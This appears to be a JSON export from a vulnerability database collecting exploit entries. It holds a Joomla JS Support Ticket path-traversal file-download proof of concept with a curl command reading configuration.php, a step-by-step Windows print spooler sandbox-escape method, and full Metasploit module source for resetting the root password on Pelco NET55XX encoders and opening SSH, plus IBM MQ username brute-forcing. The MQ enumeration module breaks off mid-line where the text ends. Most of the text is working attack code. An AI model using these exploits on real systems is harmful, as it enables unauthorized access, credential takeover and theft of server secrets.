{"zdt": [{"lastseen": "2019-12-04T07:40:44", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-09T00:00:00", "published": "2019-08-09T00:00:00", "id": "1337DAY-ID-33089", "href": "https://0day.today/exploit/description/33089", "title": "Joomla JS Support Ticket Component (com_jssupportticket) 1.1.5 - Arbitrary File Download Vulnerabili", "type": "zdt", "sourceData": "#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download\r\n#Dork: inurl:\"index.php?option=com_jssupportticket\"\r\n#Exploit Author: qw3rTyTy\r\n#Vendor Homepage: http://joomsky.com/\r\n#Software Link: https://www.joomsky.com/46/download/1.html\r\n#Version: 1.1.5\r\n#Tested on: Debian/nginx/joomla 3.9.0\r\n#####################################\r\n#Vulnerability details:\r\n#####################################\r\nVulnerable code is in line 1411 in file admin/models/ticket.php\r\n\r\n 1382\t function getDownloadAttachmentByName($file_name,$id){\r\n 1383\t if(empty($file_name)) return false;\r\n 1384\t if(!is_numeric($id)) return false;\r\n 1385\t $db = JFactory::getDbo();\r\n 1386\t $filename = str_replace(' ', '_',$file_name);\r\n 1387\t $query = \"SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = \".$id;\r\n 1388\t $db->setQuery($query);\r\n 1389\t $foldername = $db->loadResult();\r\n 1390\t\r\n 1391\t $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');\r\n 1392\t $base = JPATH_BASE;\r\n 1393\t if(JFactory::getApplication()->isAdmin()){\r\n 1394\t $base = substr($base, 0, strlen($base) - 14); //remove administrator \r\n 1395\t } \r\n 1396\t $path = $base.'/'.$datadirectory;\r\n 1397\t $path = $path . '/attachmentdata';\r\n 1398\t $path = $path . '/ticket/' . $foldername;\r\n 1399\t $file = $path . '/' . 
$filename;\r\n 1400\t\r\n 1401\t header('Content-Description: File Transfer');\r\n 1402\t header('Content-Type: application/octet-stream');\r\n 1403\t header('Content-Disposition: attachment; filename=' . basename($file));\r\n 1404\t header('Content-Transfer-Encoding: binary');\r\n 1405\t header('Expires: 0');\r\n 1406\t header('Cache-Control: must-revalidate, post-check=0, pre-check=0');\r\n 1407\t header('Pragma: public');\r\n 1408\t header('Content-Length: ' . filesize($file));\r\n 1409\t //ob_clean();\r\n 1410\t flush();\r\n 1411\t readfile($file);\t\t//!!!\r\n 1412\t exit();\r\n 1413\t exit;\r\n 1414\t }\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\n$> curl -X GET -i \"http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php\"\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33089"}, {"lastseen": "2018-03-20T01:22:35", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "href": "https://0day.today/exploit/description/29406", "id": "1337DAY-ID-29406", "title": "Microsoft Windows - Local XPS Print Spooler Sandbox Escape Exploit", "type": "zdt", "sourceData": "Windows: Local XPS Print Spooler Sandbox Escape\r\nPlatform: Windows 10 1703 and 1709 (not tested Windows 7 or 8.x)\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\n \r\nThe local print spooler can be abused to create an arbitrary file from a low privilege application including one in an AC as well as a typical Edge LPAC CP leading to EoP.\r\n \r\nDescription:\r\n \r\nWhen creating an XPS print job it's possible to specify the destination file in the DOC_INFO_1 structure passed to StartDocPrinter. 
When you call WritePrinter to write to the new printer job the privileged printer spooler service impersonates the caller and ensures that they can write to the target. This should ensure that a sandboxed user can't write to a location they don't have access to normally. Unfortunately the spooler then deletes this file it's created under impersonation and then calls NSecurityLibrary::ElevateIntegrityLevelIfLow to increase the IL of the caller's token to Medium level if the token is currently Low IL. In a naive sandbox such as IE PM this results in the actual file being written at Medium IL which would be sufficient for writing to any user controlled location such as the Startup folder. However in an AC sandbox you'd assume this wouldn't help as the AC would still be enforced even if the IL of the token was raised. It seems not, if code raises the IL of the AC token to medium (which requires SeTcbPrivilege) then the kernel also removes all traces of the AC, leaving the final token a normal medium IL user token again. Therefore in both the naive and AC cases there exists a TOCTOU attack where you can get the sandboxed token to write to a folder you control then redirect the write to another location once the token IL is raised.\r\n \r\nThe simplest way of doing this would be your standard symbolic link attacks, fortunately Windows has mitigated all the easy ways of doing such an attack. Unfortunately there's a bug in the handling of NtImpersonateAnonymousToken when running in AC which allows a symlink attack in this specific case. I've submitted the bug in NtImpersonateAnonymousToken as a separate issue. Of course there's no reason to believe that there's no other way of exploiting this issue given enough effort without the bug in NtImpersonateAnonymousToken.\r\n \r\nTo exploit do the following:\r\n \r\n1) Create a fake destination directory in an AC writable directory such as Temp. e.g. 
if you want to write to c:\\users\\user\\desktop\\hello.txt create %TEMP%\\users\\user\\desktop.\r\n2) Use bug in NtImpersonateAnonymousToken to impersonate the non-AC token and create a new C: drive symlink in the anonymous user's drive map pointing at the temp directory. Note that as this is created inside a sandbox a non-sandboxed caller will NOT follow the symlink.\r\n3) Build a native NT path in Win32 form to the target path via the anonymous token's device map directory and pass to StartDocPrinter in DOC_INFO_1. e.g. \\\\?\\GLOBALROOT\\Sessions\\0\\DosDevices\\00000000-000003E6\\C:\\Users\\user\\desktop\\hello.txt\r\n4) Create the \"fake\" target file in the temp directory and put an exclusive oplock on it.\r\n5) Call WritePrinter in another thread, in the original thread wait for the oplock to complete. The open in the print spooler will follow the symlink in this case as it's impersonating the sandboxed token.\r\n6) Delete the symlink and break the oplock, this allows the spooler to continue.\r\n7) The spooler now impersonates the medium user token and tries to open the path. The C: symlink created in 2 now no longer exists, however as we're using a device map directory then the global devicemap fallback will kick in so that the spooler sees the global C: drive.\r\n8) The spooler writes arbitrary data to the new target file outside of the sandboxed area.\r\n \r\nI really don't get why the token is elevated before writing the file. There is a mode where if you don't specify a path then the spooler will write the file to the local documents directory. As the sandboxed application has no control of the path it at least makes some sense to elevate to allow the file to be written but when writing an explicit path it seems unnecessary. Note that this also works from LPAC, at least as implemented for Edge CP's. This is because the ALPC port of the spooler has an ACE with the \u201clpacPrinting\u201d capability which is in the list of capabilities in most (all?) 
CP's for Edge. I also note that WDAG supports writing XPS files, but I don\u2019t have the time to work out the details of how WDAG works right now to see if it would also be vulnerable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. The PoC will drop the file hello.txt to the current user\u2019s desktop with arbitrary contents. The PoC will respawn itself as the Microsoft Edge AC and then execute the exploit. You must run this as a UAC split token admin. Note that this ISN\u2019T a UAC bypass, just that a split-token admin has a trivial way of getting a non-AC token by requesting the linked token. The PoC will execute just using a normal AC, to test with LPAC pass the executable any argument you like, the LPAC capabilities are copied from an Edge CP so should be representative of what\u2019s available in real life. It seems on some systems the .NET framework directory has an incorrect DACL which results in the LPAC mode failing. A fresh install of 1709 should work though.\r\n \r\n1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. Ensure the main executable and DLLs are in a user writable location (this is needed to tweak the file permissions for AC).\r\n2) Execute the PoC as normal user level split-token admin.\r\n3) Once complete a dialog should appear indicating the operation is Done.\r\n \r\nExpected Result:\r\nWriting to a file outside of a sandbox accessible directory should fail.\r\n \r\nObserved Result:\r\nThe file hello.txt is created in the current user\u2019s desktop directory with arbitrary contents.\r\n \r\nMicrosoft have made the decision that as the issue with NtImpersonateAnonymousToken (https://bugs.chromium.org/p/project-zero/issues/detail?id=1414) is now fixed then you can no longer exploit this issue. I disagree with this assessment as there's always scope for new ways of getting similar symbolic link like functionality. 
The printer APIs allow passing an arbitrary Win32 path which doesn't seem to get translated so there's plenty of scope for abuse. You can also still exploit it from a low-IL sandbox as you can still get access to the anonymous token's dos device directory, however MS don't really consider that a security boundary.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43465.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29406"}], "metasploit": [{"lastseen": "2019-11-29T02:27:11", "bulletinFamily": "exploit", "description": "This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. This module has been tested successfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.\n", "modified": "2019-07-22T17:24:55", "published": "2019-07-11T18:10:37", "id": "MSF:EXPLOIT/UNIX/HTTP/SCHNEIDER_ELECTRIC_NET55XX_ENCODER", "href": "", "type": "metasploit", "title": "Schneider Electric Pelco Endura NET55XX Encoder", "sourceData": "\ufeff##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::SSH\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Schneider Electric Pelco Endura NET55XX Encoder\",\n 'Description' => %q(\n This module exploits inadequate access controls within the webUI to enable\n the SSH service and change the root password. 
This module has been tested successfully\n on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Lucas Dinucci <idntk.lucdin@gmail.com>',\n 'Vitor Esperan\u00e7a <vitor@machiaveliclabs.com>'\n ],\n 'References' =>\n [\n ['CVE', '2019-6814'],\n ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']\n ],\n 'Payload' =>\n {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find'\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [ [ \"Universal\", {} ] ],\n 'Privileged' => true,\n 'DisclosureDate' => \"Jan 25 2019\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),\n OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])\n ]\n )\n\n register_advanced_options(\n [\n OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])\n ]\n )\n end\n\n def new_password\n datastore['NEW_PASSWORD']\n end\n\n def check\n xmlPayload = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>'\\\n '<Envelope xmlns=\"http://www.w3.org/2003/05/soap-envelope\">'\\\n '<Header xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\">'\\\n '<a:Action mustUnderstand=\"1\">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\\\n '<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\\\n '<a:ReplyTo>'\\\n '<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\\\n '</a:ReplyTo>'\\\n '<a:To mustUnderstand=\"1\">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\\\n '</Header>'\\\n '<Body>'\\\n '<Probe 
xmlns=\"http://schemas.xmlsoap.org/ws/2005/04/discovery\">'\\\n '<Types xmlns:dp0=\"http://www.onvif.org/ver10/network/wsdl\">dp0:NetworkVideoTransmitter</Types>'\\\n '</Probe>'\\\n '</Body>'\\\n '</Envelope><?xml version=\"1.0\" encoding=\"UTF-8\"?>'\n\n connect_udp(true, {'RPORT' => datastore['UDP_PORT']})\n udp_sock.put(xmlPayload)\n resp = []\n resp << udp_sock.get(datastore['TIMEOUT'])\n xmlResponse = resp.join(',')\n disconnect_udp\n if xmlResponse.include?(\"NET5501\") || xmlResponse.include?(\"NET5501-I\") || xmlResponse.include?(\"NET5501-XT\") || xmlResponse.include?(\"NET5504\") || xmlResponse.include?(\"NET5500\") || xmlResponse.include?(\"NET5516\") || xmlResponse.include?(\"NET5508\")\n return Exploit::CheckCode::Appears\n end\n CheckCode::Safe\n end\n\n def change_password\n print_status(\"#{peer} - Attempt to change the root password...\")\n post = {\"enable\": true, \"passwd\": new_password, \"userid\": \"root\"}.to_json\n\n login = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),\n 'data' => post,\n 'headers' =>\n {\n 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',\n 'Content-Type' => 'application/json;charset=utf-8'\n }\n }, timeout=datastore['TIMEOUT'])\n\n fail_with(Failure::UnexpectedReply, \"Failed to change root password\") unless login && login.code == 200\n print_good(\"#{rhost}:80 - Successfully changed the root password...\")\n print_good(\"#{rhost}:80 - New credentials: User: root / Password: #{new_password}\")\n end\n\n def do_login\n change_password\n print_status(\"#{rhost}:22 - Attempt to start a SSH connection...\")\n factory = ssh_socket_factory\n opts = {\n :auth_methods => ['password', 'keyboard-interactive'],\n :port => 22,\n :use_agent => false,\n :config => true,\n :password => new_password,\n :proxy => factory,\n :non_interactive => true,\n :verify_host_key => :never\n }\n opts.merge!(:verbose => :debug) if 
datastore['SSH_DEBUG']\n begin\n ssh = nil\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)\n end\n rescue Rex::ConnectionError\n rescue Net::SSH::Disconnect, ::EOFError\n print_error \"#{rhost}:22 SSH - Disconnected during negotiation\"\n rescue ::Timeout::Error\n print_error \"#{rhost}:22 SSH - Timed out during negotiation\"\n rescue Net::SSH::AuthenticationFailed\n print_error \"#{rhost}:22 SSH - Failed authentication\"\n rescue Net::SSH::Exception => e\n print_error \"#{rhost}:22 SSH Error: #{e.class} : #{e.message}\"\n end\n if ssh\n conn = Net::SSH::CommandStream.new(ssh)\n return conn\n end\n end\n\n def exploit\n conn = do_login\n if conn\n print_good(\"#{rhost}:22 - Session established \")\n handler(conn.lsock)\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb"}, {"lastseen": "2019-10-12T16:05:12", "bulletinFamily": "exploit", "description": "This module can be used to bruteforce usernames that can be used to connect to a queue manager. 
The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.\n", "modified": "2019-08-15T23:10:44", "published": "2018-10-28T19:29:45", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_LOGIN", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Login Check", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Login Check',\n 'Description' => 'This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 5]),\n OptInt.new('CONCURRENCY', [true, \"The number of usernames to check concurrently\", 10]),\n OptString.new('QUEUE_MANAGER', [true, \"Queue Manager name to use\" ,\"\"]),\n OptString.new('CHANNEL', [true, \"Channel to use\" ,\"SYSTEM.ADMIN.SVRCONN\"]),\n OptString.new('PASSWORD', [false, \"Optional password to attempt with login\"]),\n OptPath.new('USERNAMES_FILE',\n [ true, \"The file that contains a list of usernames. 
UserIDs are case insensitive!\"]\n )])\n #deregister_options('THREADS')\n end\n\n def run_host(ip)\n @usernames = []\n if datastore['CHANNEL'].length.to_i > 20\n print_error(\"Channel name cannot be more than 20 characters.\")\n return # do not exit the whole framework on a bad option\n end\n if datastore['QUEUE_MANAGER'].length.to_i > 48\n print_error(\"Queue Manager name cannot be more than 48 characters.\")\n return\n end\n begin\n username_list\n rescue ::Rex::ConnectionError\n rescue ::Exception => e\n print_error(\"#{e} #{e.backtrace}\")\n end\n print_line\n if(@usernames.empty?)\n print_status(\"#{ip}:#{rport} No valid users found.\")\n else\n print_good(\"#{ip}:#{rport} Valid usernames found: #{@usernames}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.usernames'\n )\n print_line\n end\n end\n\n def first_packet(channel,qm_name)\n init1 = \"\\x54\\x53\\x48\\x20\" + \t# StructId\n \"\\x00\\x00\\x01\\x0c\" + \t\t# MQSegmLen\n \"\\x01\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x00\\x00\\x01\\x11\" + \t\t# Encoding\n \"\\x04\\xb8\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0d\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# InierrFlg1\n \"\\x00\\x00\" + \t\t\t# ReserveD\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\x00\\x00\\x7f\\xec\" + \t\t# MaxTrSize\n \"\\x06\\x40\\x00\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\x04\\xb8\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x00\\x00\\x00\\x01\" + \t\t# HBInterval\n \"\\x00\\x8a\" + \t\t\t# EFLLength\n \"\\x00\" +\t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n 
\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst2\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x00\\x00\\x00\\x0a\" + \t\t# ConvBySkt\n \"\\x08\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x00\\x00\\x00\\x1b\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 + \t\t# MQM ID\n \"\\x00\\x01\\x00\\x00\\xff\\xff\\xff\\xff\" +# Unknown1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# Unknown2\n \"\\xff\\xff\\xff\\xff\\xf1\\x18\\xa6\\x93\" +# Unknown3\n \"\\x2b\\x8a\\x44\\x3c\\x67\\x53\\x73\\x08\"\t# Unknown4\n end\n\n def second_packet(channel,qm_name)\n init2 = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xf4\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers Id\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request Id\n \"\\x02\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0c\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" + \t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\xb5\\x01\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x2c\\x01\\x00\\x00\" + \t\t# HBInterval\n \"\\x8a\\x00\" + \t\t\t# EFLLength\n \"\\x00\" + 
\t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst2\n \"\\xff\\xff\" + \t\t\t# MsgCprsLst3\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x0a\\x00\\x00\\x00\" + \t\t# ConvBySkt\n \"\\x00\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x1b\\x00\\x00\\x00\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 \t\t# MQM ID\n end\n\n def send_userid(userid,uname)\n\n if datastore['PASSWORD'].nil?\n password = \"\\x00\" * 12\n else\n password = datastore['PASSWORD']\n if (password.length > 12)\n print_warning(\"Passwords greater than 12 characters are unsupported. Truncating...\")\n password = password[0...12] # exclusive range: keep exactly 12 bytes so the padding below never goes negative\n end\n password = password + ( \"\\x00\" * (12-password.length) )\n end\n vprint_status(\"Using password: '#{password}' (Length: #{password.length})\")\n\n send_userid = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xa8\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x08\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x55\\x49\\x44\\x20\" + \t\t# StructId\n userid + \t\t\t\t# UserId - Doesn't affect anything\n password + # Password\n uname + \t\t\t\t# Long UID - This matters!\n \"\\x00\" + \t\t\t\t# SID Len\n \"\\x00\" * 39 \t\t\t# Unknown\n end\n\n def start_conn(qm_name)\n start_conn = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x01\\x38\" + \t\t# 
MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x81\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x00\\x00\\x01\\x38\" + \t\t# Reply Len\n \"\\x00\\x00\\x00\\x00\" + \t\t# Compl Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Reason Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Object Hdl\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x4d\\x51\\x20\\x45\\x78\\x70\\x6c\" + \t# Appl Name\n \"\\x6f\\x72\\x65\\x72\\x20\\x39\\x2e\" + \t# Appl Name\n \"\\x30\\x2e\\x30\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x1c\\x00\\x00\\x00\" + \t\t# ApplType\n \"\\x00\" * 32 + \t\t\t# AccntTok\n \"\\x03\\x00\\x00\\x00\" + \t\t# MQCONNX\n \"\\x00\\x00\\x00\\x00\" + \t\t# Options\n \"\\x46\\x43\\x4e\\x4f\" + \t\t# Struct ID\n \"\\x02\\x00\\x00\\x00\" + \t\t# Version\n \"\\x00\\x00\\x00\\x00\" + \t\t# Option\n \"\\x4d\\x51\\x4a\\x42\\x30\\x39\\x30\" + \t# msgid\n \"\\x30\\x30\\x30\\x30\\x34\" + \t\t# msgid\n \"MQM\" + \"\\x20\" * 45 + \t\t# MqmId\n \"\\x00\" * 68\t\t\t\t# Unknown\n end\n\n def username_list\n username_data = get_usernames\n while (username_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_username = username_data.shift\n if this_username.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_username) do |username|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{username}...\"\n channel = datastore['CHANNEL']\n if channel.length > 20\n print_error(\"Channel name must be less than 20 characters.\")\n next\n end\n channel += \"\\x20\" * (20-channel.length.to_i) # max channel name length is 20\n qm_name = 
datastore['QUEUE_MANAGER']\n if qm_name.length > 48\n print_error(\"Queue Manager name must be less than 48 characters.\")\n next\n end\n qm_name += \"\\x20\" * (48-qm_name.length.to_i) # max queue manager name length is 48\n if username.length > 12\n print_error(\"Username must be less than 12 characters.\")\n next\n end\n uname = username + \"\\x20\" * (64-username.length.to_i)\n userid = username + \"\\x20\" * (12 - username.length.to_i) # this doesnt make a difference\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(first_packet(channel,qm_name))\n first_response = s.get_once(-1,timeout)\n if first_response[-4..-1] == \"\\x00\\x00\\x00\\x02\" # CHANNEL_WRONG_TYPE code\n print_error(\"Channel needs to be MQI type!\")\n next\n end\n s.put(second_packet(channel,qm_name))\n second_response = s.get_once(-1,timeout)\n s.put(send_userid(userid,uname))\n s.put(start_conn(qm_name))\n data = s.get_once(-1,timeout)\n if data[41..44] == \"\\x00\\x00\\x00\\x00\"\n print_status(\"Found username: #{username}\")\n @usernames << username\n end\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_usernames\n if(! @common)\n File.open(datastore['USERNAMES_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_login.rb"}, {"lastseen": "2019-11-13T17:23:40", "bulletinFamily": "exploit", "description": "Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. 
Any channel type can be used to get this information as long as the name of the channel is valid.\n", "modified": "2018-11-21T22:09:18", "published": "2018-10-28T16:09:17", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_ENUM", "href": "", "type": "metasploit", "title": "Identify Queue Manager Name and MQ Version", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Identify Queue Manager Name and MQ Version',\n 'Description' => 'Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.',\n 'Author' => [ 'Petros Koutroumpis' ],\n 'License' => MSF_LICENSE\n ))\n register_options(\n [\n OptString.new('CHANNEL', [ true, \"Channel to use\" ,\"SYSTEM.DEF.SVRCONN\"]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent ports to check per host\", 10]),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptString.new('PORTS', [true, 'Ports to probe', '1414']),\n\n ])\n deregister_options('RPORT')\n end\n\n\n def create_packet(channel_type)\n chan = datastore['CHANNEL'] + 